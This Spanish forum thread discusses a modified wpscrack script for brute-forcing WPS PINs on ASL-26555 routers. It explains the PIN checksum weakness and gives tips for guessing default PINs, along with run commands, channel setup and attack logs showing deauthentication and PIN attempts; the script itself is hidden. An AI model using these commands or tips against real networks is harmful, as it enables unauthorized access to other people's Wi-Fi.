Board Stats

  • stats Total de Usuarios: 23539
  • stats Total de Mensajes: 108931
  • stats Total de Temas: 10524
  • stats Total de Categorías: 15
  • stats Total de Foros: 74
  • stats Máx. usuarios conectados (simultáneamente): 1021

Ultimo registro



Autor Tema: wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3  (Leído 186094 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Weiot

  • Usuario
  • *
  • Mensajes: 13
He estado viendo el primer post, no teneis ninguna informacion aun sobre wlan_xxxx 8C:0C:A3?? Saludos!!

ROUTERS ASL-26555 MAC 8C:0C:A3

Yo sí que tengo información nueva. No sé si alguien la puso ya esto pero aquí lo dejo por si a alguien le es útil.

Tanto reaver como wpscrack utilizan 2 vulnerabilidades de WPS.

- La primera separa los 8 dígitos del PIN de manera que cuando comprobamos los más significativos recibimos mensajes de respuesta hasta M6 (Antes hasta M4), de esta manera disminuímos de 10⁸ posibilidades a 10⁴ + 10⁴. De 100.000.000 a 20.000
- La segunda es que el último número del PIN es una suma de verificación (checksum) de los otros 7 restantes, de esta manera disminuímos las posibilidades a 10⁴ + 10³, es decir, 11.000. Bien, pues esta segunda "vulnerabilidad" no está contemplada los routers ASL-26555, de hecho a la hora de generar PINs, estos routers no cumplen con la especificación de WPS aquí detallada
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
. Prueben a ejecutar a mano el algoritmo de verificación con el pin 93502170, comprobarán que no se verifica.
- Así que, con permiso de Stefan, he eliminado esta parte del algoritmo en el código del wpscrack para que podáis usarlo.

Aquí tenéis el resultado:
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


Como estamos hablando de fuerza bruta os comento un  consejo al respecto. Si el router tiene de ESSID WLAN_XXXX es un indicador de que el usuario es eso, nivel usuario así que probablemente tenga el PIN por defecto, que en modelos ASL-26555 (con MAC 8C:0C:A3) empieza por 9, de esta manera adivinaréis la primera mitad en tan solo 1000 pruebas. Estaríamos ahorrando 9.000 de 20.000, así que nos quedarían unas 11.000... prácticamente igual que el script inicial de Stefan.

El programa es un poco raro a la hora de hacerlo funcionar ya que requiere algunas librerías extra y la sintáxis por línea de comandos es un poco especial, si tenéis alguna duda no dudéis en consultarlo por aquí.

Sin nada más, que aprovechen.

NOTA IMPORTANTE 1: Lo de que todos los routers de este tipo tienen PINS que empiezan por 9 sólo es una conjetura mía. Por lo tanto... ¡NO TODOS LOS PIN EMPIEZAN POR 9!
« Última modificación: Noviembre 18, 2012, 14:31:16 pm por Weiot »

Desconectado scragg

  • Usuario
  • *
  • Mensajes: 123
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #1 en: Noviembre 15, 2012, 10:32:00 am »
Buen aporte, Weiot, pero este programa está sin compilar no? No se puede desacargar todavia?

Aver si vamos arrojando luz sobre estos router.

Desconectado Weiot

  • Usuario
  • *
  • Mensajes: 13
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #2 en: Noviembre 15, 2012, 10:53:50 am »
Buen aporte, Weiot, pero este programa está sin compilar no? No se puede desacargar todavia?

Aver si vamos arrojando luz sobre estos router.

A ver, el programa está en Python, es decir que no hace falta compilarlo ya que python lo interpreta.

El comando en Ubuntu (por ejemplo) sería algo así como:

Código: [Seleccionar]
sudo python wpscrack-BF.py --iface mon0 --client <TU MAC EN MINÚSCULAS> --bssid <MAC ROUTER EN MINÚSCULA> --ssid <SSID DEL ROUTER> --pin <PIN INICIO> -v

kcdtv

  • Visitante
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #3 en: Noviembre 15, 2012, 11:30:51 am »
Antes de cualquier cosa bienvenido al foro y muchas gracias  :)
Lo que dices es un notición.
Se merece un tema aparte con chincheta.
Me dices que titulo le quieres dar.  ;)
Ahora quedaría verificar que la connexión se pueda establecer con este PIN WPS, me explico, que no sea un bug y que sea realmente activado y funcional el WPS mediante metodo PIN.
¿Podrías pasarme por privado los datos de este routeur?
(bssid, essid, PIN WPS, serial, versión firmware, llave WEP/WPA por defecto, modelo exacto, estado del WPS por defecto y lo que veas relevante)
gracias de antemano  ;)

Lo que nos dice atim podría indicar un bug general del wps... y que no funciona por tener un PIN no conforme...

bssid: 8C:0C:A3:XX:XX:XX
essid: WLAN_XXXX
pin: 8X5XXXXX
wpa psk: 20 caracteres (números y letras en mayúsculas)
modelo de router: alpha asl-26555
versión firmware: V1.1.0.20_CL
wps activado por defecto: sí

He probado con reaver con la opción -p y el pin que trae por defecto sin obtener resultados, ya que entra en una secuencia repetitiva y no suelta la wpa.   ???
« Última modificación: Noviembre 15, 2012, 12:02:38 pm por kcdtv »

Desconectado cristi_28

  • Usuario
  • *
  • Mensajes: 120
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #4 en: Noviembre 15, 2012, 12:03:33 pm »
Código: [Seleccionar]
root@bt:~# '/root/wpscrack-BF.py' --iface=mon0 --client=00:c0:ca:@@@@@@ --bssid=d0:ae:ec:@@@@ --ssid=WLAN_@@@@ -v
sniffer started
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/lib/python2.6/threading.py", line 532, in __bootstrap_inner
    self.run()
  File "/usr/lib/python2.6/threading.py", line 484, in run
    self.__target(*self.__args, **self.__kwargs)
  File "/root/wpscrack-BF.py", line 518, in sniffer
    sniff(store=0, stop_filter=lambda x: self.sniffer_filter(x))
  File "/usr/lib/pymodules/python2.6/scapy/sendrecv.py", line 534, in sniff
    s = L2socket(type=ETH_P_ALL, *arg, **karg)
TypeError: __init__() got an unexpected keyword argument 'stop_filter'

------------------- attempt #1
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.062 seconds
------------------- attempt #2
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.079 seconds
------------------- attempt #3
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.143 seconds
------------------- attempt #4
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
^CTIMEOUT!!
Traceback (most recent call last):
  File "/root/wpscrack-BF.py", line 622, in <module>
    main()
  File "/root/wpscrack-BF.py", line 616, in main
    wps.run()
  File "/root/wpscrack-BF.py", line 194, in run
    self.rcved.wait()
  File "/usr/lib/python2.6/threading.py", line 395, in wait
    self.__cond.wait(timeout)
  File "/usr/lib/python2.6/threading.py", line 239, in wait
    waiter.acquire()
KeyboardInterrupt
root@bt:~#
creo que falta algo para instalar aver si nos hace un tutorial como instalarlo y hacerlo funcionar
« Última modificación: Noviembre 15, 2012, 12:26:57 pm por kcdtv »

kcdtv

  • Visitante
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #5 en: Noviembre 15, 2012, 12:11:33 pm »
intenta aumentar el espacio entre peticiones y aumentar el tiempo de recepción par el time out.
Divido ya el tema para no desviar nuestro hilo y publicaremos el full disclosure en cuanto tenga los datos de este routeur (como siempre).
 @ Welot
El titulo es provisional, tu me dices cual quieres.  ;)

@ Cristi_28 upsssssss.
No pongas datos personales sin editar  ;)
he puesto unos @  ;)
« Última modificación: Noviembre 15, 2012, 19:32:49 pm por kcdtv »

Desconectado cristi_28

  • Usuario
  • *
  • Mensajes: 120
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #6 en: Noviembre 15, 2012, 12:26:32 pm »
no es el tema de time out lo he puesto en 20 sec y es lo mismo creo que le falta alguna dependencia

kcdtv

  • Visitante
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #7 en: Noviembre 15, 2012, 12:27:52 pm »
Esta bien instalado, sino no te corre  ;)
Con 20 segundos es seguro que el problema no esta en el delay para el time out.
Ahora Welot dice solo haber quitado la regla del checksum y esto no afecta el functionamiento de wpscrack más alla que en este aspecto.
wpscrack es más rapido que reaver pero menos eficiente en asociar y llevar el attaque...

Usando Xubuntu, tengo ya el aircrack-ng instalado y reaver.
ejecuto el script y tengo este mensage de error

Código: [Seleccionar]
Documentos$ python /home/kcdtv/Documentos/wpscrack-BF.py
Traceback (most recent call last):
  File "/home/kcdtv/Documentos/wpscrack-BF.py", line 13, in <module>
    from scapy.all import *
ImportError: No module named scapy.all

En debian based (xubuntu, ubuntu etc...) lo tenéis en el gestor de paquetes synaptic.
Si teneís otra distribución ir os a la pagina de
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
y descargar el paquete para vuestra distribución

Despues instalación de scapy.all, todo va bien >

Código: [Seleccionar]
kcdtv@noname4u:~/Documentos$ python /home/kcdtv/Documentos/wpscrack-BF.py
check arguments or use --help!

Queda tener entre manos este modelo de routeur concreto para pruebas  :'(

 :'(
« Última modificación: Noviembre 15, 2012, 12:57:32 pm por kcdtv »

Desconectado kyrandio

  • Colaborador
  • Usuario
  • *****
  • Mensajes: 934
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #8 en: Noviembre 15, 2012, 12:39:44 pm »
animo colegas, fijo k sacais algo en breve :)

kcdtv

  • Visitante
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #9 en: Noviembre 15, 2012, 13:01:40 pm »
Si el router tiene de ESSID WLAN_XXXX es un indicador de que el usuario es eso, nivel usuario así que probablemente tenga el PIN por defecto, que en modelos ASL-26555 (con MAC 8C:0C:A3) empieza por 9, de esta manera adivinaréis la primera mitad en tan solo 1000 pruebas. Estaríamos ahorrando 9.000 de 20.000, así que nos quedarían unas 11.000... prácticamente igual que el script inicial de Stefan.

[time]Noviembre 15, 2012, 13:02:54 pm[/time]
Los datos que tenemos no dicen esto > todos los PIN NO empiezan por 9.


En los datos de los cuales dispongo todos los PINes siguen la norma wps
......... checksum en el ultimo digito..... 

« Última modificación: Noviembre 15, 2012, 13:13:48 pm por kcdtv »

Desconectado Weiot

  • Usuario
  • *
  • Mensajes: 13
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #10 en: Noviembre 15, 2012, 13:21:37 pm »
Antes de cualquier cosa bienvenido al foro y muchas gracias  :)
Lo que dices es un notición.
Se merece un tema aparte con chincheta.
Me dices que titulo le quieres dar.  ;)
Ahora quedaría verificar que la connexión se pueda establecer con este PIN WPS, me explico, que no sea un bug y que sea realmente activado y funcional el WPS mediante metodo PIN.
¿Podrías pasarme por privado los datos de este routeur?
(bssid, essid, PIN WPS, serial, versión firmware, llave WEP/WPA por defecto, modelo exacto, estado del WPS por defecto y lo que veas relevante)
gracias de antemano  ;)

Lo que nos dice atim podría indicar un bug general del wps... y que no funciona por tener un PIN no conforme...

De nada hombre, en principio gracias a todos vosotros por formar parte de esta comunidad y mantenerla viva.

Por otro lado y aunque el aporte parezca un noticion como comentas, no es para tanto, no he agregado mi nick ni al código fuente porque realmente lo que he hecho es muy sencillo, solo bastaba con darse cuenta de que no hace fuerza bruta sino que filtra PINs o dicho de otra manera, no van correlativos.

En cuanto a esto:

Citar
Ahora quedaría verificar que la connexión se pueda establecer con este PIN WPS, me explico, que no sea un bug y que sea realmente activado y funcional el WPS mediante metodo PIN.

no sé qué quieres decir, cuando encuentra el PIN correcto establece la conexión y te devuelve la WPA. Obviamente lo he probado y funciona.

En cuanto al título ya está bien así ;)

kcdtv

  • Visitante
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #11 en: Noviembre 15, 2012, 13:26:27 pm »
me puedes facilitar los datos por privado por favor? Te envio un MP  ;)

Desconectado Weiot

  • Usuario
  • *
  • Mensajes: 13
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #12 en: Noviembre 15, 2012, 13:28:06 pm »

Código: [Seleccionar]
root@bt:~# '/root/wpscrack-BF.py' --iface=mon0 --client=00:c0:ca:@@@@@@ --bssid=d0:ae:ec:@@@@ --ssid=WLAN_@@@@ -v
sniffer started
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/lib/python2.6/threading.py", line 532, in __bootstrap_inner
    self.run()
  File "/usr/lib/python2.6/threading.py", line 484, in run
    self.__target(*self.__args, **self.__kwargs)
  File "/root/wpscrack-BF.py", line 518, in sniffer
    sniff(store=0, stop_filter=lambda x: self.sniffer_filter(x))
  File "/usr/lib/pymodules/python2.6/scapy/sendrecv.py", line 534, in sniff
    s = L2socket(type=ETH_P_ALL, *arg, **karg)
TypeError: __init__() got an unexpected keyword argument 'stop_filter'

------------------- attempt #1
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.062 seconds
------------------- attempt #2
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.079 seconds
------------------- attempt #3
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.143 seconds
------------------- attempt #4
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
^CTIMEOUT!!
Traceback (most recent call last):
  File "/root/wpscrack-BF.py", line 622, in <module>
    main()
  File "/root/wpscrack-BF.py", line 616, in main
    wps.run()
  File "/root/wpscrack-BF.py", line 194, in run
    self.rcved.wait()
  File "/usr/lib/python2.6/threading.py", line 395, in wait
    self.__cond.wait(timeout)
  File "/usr/lib/python2.6/threading.py", line 239, in wait
    waiter.acquire()
KeyboardInterrupt
root@bt:~#
creo que falta algo para instalar aver si nos hace un tutorial como instalarlo y hacerlo funcionar

En efecto, te faltan librerías.

Citar
sudo apt-get update
sudo apt-get install python python-crypto python-scapy python-pycryptopp

También te hace falta ejecutar el script con python, tal como he puesto un poco más arriba.

Por otro lado me da la sensación que utilizas Backtrack, es decir, no tendrás scapy 2.0 en tus repositorios así que tendrás que buscarte un repositorio más actualizado o instalarlo a mano.
« Última modificación: Noviembre 15, 2012, 13:30:49 pm por Weiot »

kcdtv

  • Visitante
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #13 en: Noviembre 15, 2012, 13:32:44 pm »
desde synaptic con backtrack  ;)
Código: [Seleccionar]
# apt-get install synaptic
« Última modificación: Noviembre 15, 2012, 13:41:03 pm por kcdtv »

Desconectado Weiot

  • Usuario
  • *
  • Mensajes: 13
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #14 en: Noviembre 15, 2012, 13:38:07 pm »
desde synaptic con backtrack  ;)

Si, o con apt o con aptitude, la cosa es que parece que scapy viene desactualizado en ese repositorio. De hecho con el que viene en Backtrack wpscrack no funciona.

Desconectado cristi_28

  • Usuario
  • *
  • Mensajes: 120
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #15 en: Noviembre 15, 2012, 13:50:41 pm »
Código: [Seleccionar]
root@bt:~# sudo apt-get install python python-crypto python-scapy python-pycryptopp
Reading package lists... Done
Building dependency tree       
Reading state information... Done
python is already the newest version.
python-crypto is already the newest version.
python-scapy is already the newest version.
python-pycryptopp is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@bt:~# '/root/wpscrack-BF.py' --iface mon0 --client 00:c0:ca:@@:@@:@@ --bssid d0:ae:ec:@@:@@:@@ --ssid=WLAN_9A58 -t 10 -v
/root/.local/lib/python2.6/site-packages/scapy/crypto/cert.py:10: DeprecationWarning: the sha module is deprecated; use the hashlib module instead
  import os, sys, math, socket, struct, sha, hmac, string, time
/root/.local/lib/python2.6/site-packages/scapy/crypto/cert.py:11: DeprecationWarning: The popen2 module is deprecated.  Use the subprocess module.
  import random, popen2, tempfile
sniffer started
------------------- attempt #1
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 10.089 seconds
------------------- attempt #2
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 10.098 seconds
------------------- attempt #3
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 10.119 seconds
------------------- attempt #4
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 10.095 seconds
------------------- attempt #5
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
^CTIMEOUT!!
Traceback (most recent call last):
  File "/root/wpscrack-BF.py", line 622, in <module>
    main()
  File "/root/wpscrack-BF.py", line 616, in main
    wps.run()
  File "/root/wpscrack-BF.py", line 194, in run
    self.rcved.wait()
  File "/usr/lib/python2.6/threading.py", line 395, in wait
    self.__cond.wait(timeout)
  File "/usr/lib/python2.6/threading.py", line 239, in wait
    waiter.acquire()
KeyboardInterrupt

root@bt:~# scapy
WARNING: No route found for IPv6 destination :: (no default route?)
/root/.local/lib/python2.6/site-packages/scapy/crypto/cert.py:10: DeprecationWarning: the sha module is deprecated; use the hashlib module instead
  import os, sys, math, socket, struct, sha, hmac, string, time
/root/.local/lib/python2.6/site-packages/scapy/crypto/cert.py:11: DeprecationWarning: The popen2 module is deprecated.  Use the subprocess module.
  import random, popen2, tempfile
Welcome to Scapy (2.2.0)
>>>
« Última modificación: Noviembre 15, 2012, 13:55:17 pm por kcdtv »

Desconectado Coeman76

  • Colaborador
  • Usuario
  • *****
  • Mensajes: 1724
  • Wifiiu fiuuuu!!!
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #16 en: Noviembre 15, 2012, 13:52:10 pm »
Funciona perfectamente

Tira bien los M1,M2,M3 y M4 y probando pines....probado en ubuntu 12.04

Lo he probado en mi router activando el WPS y la aplicacion a nivel funcionamiento en principio va correctamente.

No tengo en mis manos ningun router de las caracteristicas del hilo pero en tenerlo realizo las pruebas.

Gran trabajo...

Un saludo

@Cristi_28

A mi me pasa igual que a ti si hago las pruebas con un adaptador usb

sin embargo si realizo las pruebas desde la integrada del portatil funciona correctamente

un saludo
« Última modificación: Noviembre 15, 2012, 13:54:47 pm por Coeman76 »
NO ATIENDO M.P. PIDIENDO ATENCION PERSONALIZADA... SI TIENES UNA DUDA PREGUNTALA EN EL FORO.

kcdtv

  • Visitante
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #17 en: Noviembre 15, 2012, 13:59:15 pm »
@ cristi
Código: [Seleccionar]
sudo apt-get install python python-crypto python-scapy python-pycryptopp
Reading package lists... Done
Building dependency tree       
Reading state information... Done
python is already the newest version.
python-crypto is already the newest version.
python-scapy is already the newest version.
python-pycryptopp is already the newest version.

como puedes ver ya tenías instalado lo que te hacia falta "s already the newest version" , el programa esta corriendo

@Welot
es fundamental y de primera importencia que me proporciones uno de los datos en los cuales te basas.
De momento los datos de los cuales dispongo discreditan lo que dices.  :-\
(el checksum es valido)

@ cristi
wpscrack.py ha sido disñeado con un ath9k_htc, funcionna con rtl8187l, lo démás no se dice nada, es casi seguro que con atheros interno no habrá problema (ath5K), los otros chipset USB no se sabe muy bien dado que el proyecto fue abandonado enseguida)

@Weiot
te reitero mi demanda, datos por fa  ;)
Eres nuevo aquí y en este forum nos basamos en datos seguros al 100% para trabajar, veo que publicaste esto solo aquí, se agradece la exclusiva  ;)
« Última modificación: Noviembre 15, 2012, 14:40:20 pm por kcdtv »

Desconectado Weiot

  • Usuario
  • *
  • Mensajes: 13
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #18 en: Noviembre 15, 2012, 14:52:43 pm »
@ cristi
Código: [Seleccionar]
sudo apt-get install python python-crypto python-scapy python-pycryptopp
Reading package lists... Done
Building dependency tree       
Reading state information... Done
python is already the newest version.
python-crypto is already the newest version.
python-scapy is already the newest version.
python-pycryptopp is already the newest version.

como puedes ver ya tenías instalado lo que te hacia falta "s already the newest version" , el programa esta corriendo

@Welot
es fundamental y de primera importencia que me proporciones uno de los datos en los cuales te basas.
De momento los datos de los cuales dispongo discreditan lo que dices.  :-\
(el checksum es valido)

@ cristi
wpscrack.py ha sido disñeado con un ath9k_htc, funcionna con rtl8187l, lo démás no se dice nada, es casi seguro que con atheros interno no habrá problema (ath5K), los otros chipset USB no se sabe muy bien dado que el proyecto fue abandonado enseguida)

@Weiot
te reitero mi demanda, datos por fa  ;)
Eres nuevo aquí y en este forum nos basamos en datos seguros al 100% para trabajar, veo que publicaste esto solo aquí, se agradece la exclusiva  ;)

1º Que apt te diga que está todo actualizado no significa que esté actualizado, sino que tienes la versión más actual que dispones EN TUS REPOSITORIOS.
2º Para estos routers (y ya llevo probados 3, de los cuales uno de ellos, el mío) y en concreto, el de los datos que te he enviado el checksum no se cumple. De hecho esto explica el bug del bucle infinito que por ejemplo tiene reaver al llegar al 99.99%. Es decir, cuando encuentra la mitad de la contraseña, no prueba los últimos 4 dígitos sino los 3 siguientes. Es decir, de 9.999 combinaciones estás probando un subconjunto de estas en el cual no está el PIN correcto por lo descrito anteriormente. Pon un ejemplo aquí de un PIN por defecto de un mismo modelo de router (REAL) y describe el algoritmo del checksum.
3º No sé si se me olvidó un detalle del programa que colgué, antes de ponerlo a trabajar tenéis que cambiar la interface de manera manual al canal del router que queremos atacar:

Código: [Seleccionar]
sudo iwconfig mon0 channel X
« Última modificación: Noviembre 15, 2012, 14:56:07 pm por Weiot »

kcdtv

  • Visitante
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #19 en: Noviembre 15, 2012, 15:29:38 pm »
Gracias por los datos, los estoy mirando para ver si tiene que ver con versión de serial u otra cosa  ;)

CONFIRMO LO ADELANTADO POR WEiOT  ;D
Gran aporte, no solamente llevas la información pero también el remedio...

repspecto a lo que succede a cristi_28 >
 
Código: [Seleccionar]
root@bt:~# sudo apt-get install python python-crypto python-scapy python-pycryptopp
Reading package lists... Done
Building dependency tree       
Reading state information... Done
python is already the newest version.
python-crypto is already the newest version.
python-scapy is already the newest version.
python-pycryptopp is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@bt:~# '/root/wpscrack-BF.py' --iface mon0 --client 00:c0:ca:@@:@@:@@ --bssid d0:ae:ec:@@:@@:@@ --ssid=WLAN_9A58 -t 10 -v

Aquí se pide que se descargue y instale los paquetes ( sudo apt-get install)
y despues de verificar nos dice
Código: [Seleccionar]
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.es decir que todo esta ya instalado, no hace falta instalr nada o actualizar.
si pongo python que ya tengo instalado
Código: [Seleccionar]
kcdtv@noname4u:~/Documentos$ sudo apt-get install python
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
python ya está en su versión más reciente.
0 actualizados, 0 se instalarán, 0 para eliminar y 19 no actualizados.
y no instala nada, se para el asunto como más arriba.

Si instalo algo que no tengo con sudo apt get isntall, ves el proceso en consola y te pide confirmación para las dependecias etc...>
Código: [Seleccionar]
kcdtv@noname4u:~/Documentos$ sudo apt-get install deluge-torrent
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
Se instalarán los siguientes paquetes extras:
  deluge deluge-common deluge-gtk libblas3gf libboost-filesystem1.46.1
  libboost-python1.46.1 libboost-system1.46.1 libboost-thread1.46.1
  libgfortran3 liblapack3gf libmikmod2 libportmidi0 libsdl-mixer1.2
  libsdl-ttf2.0-0 libsmpeg0 libtorrent-rasterbar6 oss-compat python-libtorrent
  python-numpy python-pygame
Paquetes sugeridos:
  python3 libtorrent-rasterbar-dbg python-numpy-doc python-numpy-dbg
  python-nose python-dev gfortran timidity
Se instalarán los siguientes paquetes NUEVOS:
  deluge deluge-common deluge-gtk deluge-torrent libblas3gf
  libboost-filesystem1.46.1 libboost-python1.46.1 libboost-system1.46.1
  libboost-thread1.46.1 libgfortran3 liblapack3gf libmikmod2 libportmidi0
  libsdl-mixer1.2 libsdl-ttf2.0-0 libsmpeg0 libtorrent-rasterbar6 oss-compat
  python-libtorrent python-numpy python-pygame
0 actualizados, 21 se instalarán, 0 para eliminar y 19 no actualizados.
Necesito descargar 11,4 MB de archivos.
Se utilizarán 38,2 MB de espacio de disco adicional después de esta operación.
¿Desea continuar [S/n]?
« Última modificación: Noviembre 15, 2012, 15:44:10 pm por kcdtv »

Desconectado Weiot

  • Usuario
  • *
  • Mensajes: 13
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #20 en: Noviembre 15, 2012, 16:42:27 pm »
A ver, lo repito una vez más. El hecho de que apt diga que está actualizado NO SIGNIFICA QUE ESTÁ ACTUALIZADO. Está actualizado CON RESPECTO AL REPOSITORIO QUE TENGAMOS CONFIGURADO.

En este ejemplo, si en el repositorio de cristi_28 está la versión de scapi 2.1 y ella tiene instalada la 2.0 pues sí, se actualizará de la 2.0 a la 2.1. Pero es que ya existe la 2.2!!! y por mucho que hagas upgrade siempre te quedarás con la 2.1 porque EN TU REPOSITORIO SOLO ESTÁ LA 2.1.

¿Me explico?

Vamos a intentar darle remedio a este problema. A ver, Cristi_28 podrías escribir este comando en la consola y mostrarnos el resultado?

Código: [Seleccionar]
dpkg -l python-scapy (como root)

kcdtv

  • Visitante
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #21 en: Noviembre 15, 2012, 17:40:43 pm »
Te había entendido.  ;)
Es que lo instale pasando por apt-get y he obtenido la versión 2.2 de ahí mi sorpresa
Código: [Seleccionar]
dpkg -l python-scapy
Deseado=Desconocido/Instalar/Eliminar/Purgar/Retener
| Estado=No/Instalado/Config-files/Desempaquetado/Medio-conf/Medio-inst/espera-disparo/pendiente-disparo
|/ Err?=(ninguno)/Requiere-reinst (Estado,Err: mayúsc.=malo)
||/ Nombre         Versión       Descripción
+++-==============-==============-============================================
ii  python-scapy   2.2.0-1        Packet generator/sniffer and network scanner

La versión de scapy 2.2 fue saccada hace 20 messes atrás. Por esto estoy sorprendido respecto a que sea esto el problema...
No se, en casa tengo backtrack 5r3 instalado y probare de mi lado.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
usan scapy 2.2 en backtrack 5 r2 pero no explicitan los pasos a seguir concretamente, redirigen hacía la pagina de scapy
 

Citar
20 months ago   v2.2.0   changeset | changelog | files
2010-04-10   v2.1.1   changeset | changelog | files
2009-12-14   v2.1.0   changeset | changelog | files
2009-02-09   v2.0.1   changeset | changelog | files
2008-12-25   v2.0.0.11   changeset | changelog | files
2008-10-01   v2.0.0.10   changeset | changelog | files
2008-09-12   v2.0.0.9   changeset | changelog | files
2008-09-12   v2.0.0.8   changeset | changelog | files
2008-08-31   v2.0.0.7   changeset | changelog | files
2008-08-28   v2.0.0.6

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


Aquí lo hacen actualizando los repositorios de backtrack>
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


vemos que tienen el cambio preparandose
Citar
Preparing to replace scapy 2.1.0-bt1 (using .../scapy_2.2.0-bt0_all.deb) ...

Unpacking replacement scapy ...

y tenemos confirmación

Citar
Setting up scapy (2.2.0-bt0) ...

esto parece ser la solución... luego pruebo  comento



Y una chincheta para este tema, gracias otra vez por el aporte compi  :)


« Última modificación: Noviembre 15, 2012, 18:44:34 pm por kcdtv »

Desconectado Weiot

  • Usuario
  • *
  • Mensajes: 13
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #22 en: Noviembre 15, 2012, 18:03:43 pm »
Te había entendido.  ;)
Es que lo instale pasando por apt-get y he obtenido la versión 2.2 de ahí mi sorpresa
Código: [Seleccionar]
dpkg -l python-scapy
Deseado=Desconocido/Instalar/Eliminar/Purgar/Retener
| Estado=No/Instalado/Config-files/Desempaquetado/Medio-conf/Medio-inst/espera-disparo/pendiente-disparo
|/ Err?=(ninguno)/Requiere-reinst (Estado,Err: mayúsc.=malo)
||/ Nombre         Versión       Descripción
+++-==============-==============-============================================
ii  python-scapy   2.2.0-1        Packet generator/sniffer and network scanner

La versión de scapy 2.2 fue saccada hace 20 messes atrás. Por esto estoy sorprendido respecto a que sea esto el problema...
No se, en casa tengo backtrack 5r3 instalado y probare de mi lado.
 

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


Y una chincheta para este tema, gracias otra vez por el aporte compi  :)

Perfecto, prueba pues con el paquete py25-crypto  A ver si lo solucionamos de una vez ;)

Por otra parte, ¿comprobaste lo del checksum?

kcdtv

  • Visitante
Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #23 en: Noviembre 15, 2012, 18:30:45 pm »
Perdona por no haberte confirmado, pero a mi tampoco me sale.
http://i.imm.io/LIxV.png
wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3


si me quedo con los 7 primeros números debería dar nos
 93502177
¿Coincidimos?

Desconectado Weiot

  • Usuario
  • *
  • Mensajes: 13
